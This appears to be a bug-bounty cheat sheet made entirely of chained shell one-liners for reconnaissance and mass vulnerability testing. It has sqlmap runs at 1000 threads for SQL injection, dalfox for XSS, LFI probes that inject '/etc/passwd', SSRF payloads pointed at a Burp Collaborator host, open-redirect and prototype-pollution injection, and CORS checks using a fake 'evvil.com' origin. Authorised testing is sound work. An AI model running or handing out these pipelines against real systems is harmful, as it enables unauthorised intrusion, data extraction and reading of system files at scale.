XSS ⪼
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
SQLi ⪼
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
SSRF ⪼
findomain -t target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net
LFI ⪼
gau vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
OPEN REDIRECT ⪼
gau vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
PROTOTYPE POLLUTION ⪼
subfinder -d target.com | httpx -silent | sed 's/$/\/?__proto__[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS//g" | grep "VULN"
CORS ⪼
gau vuln.target.com | while read -r url; do if curl -s -I -H "Origin: https://evvil.com" -X GET "$url" | grep -q 'https://evvil.com'; then echo "[Potential CORS Found] $url"; else echo "Nothing on $url"; fi; done
Extract .js ⪼
echo target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder vuln.target.com | waybackurls | grep -E "\.json(onp?)?$" | anew
Extract URLs From Comment ⪼
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=_|!:,.;]*[-A-Za-z0-9+&@#/%=_|]'
Dump In-scope Assets From HackerOne ⪼
curl -sL "https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true" | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]'
Find live host/domain/assets ⪼
subfinder -d vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
Screenshot ⪼
assetfinder -subs-only target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'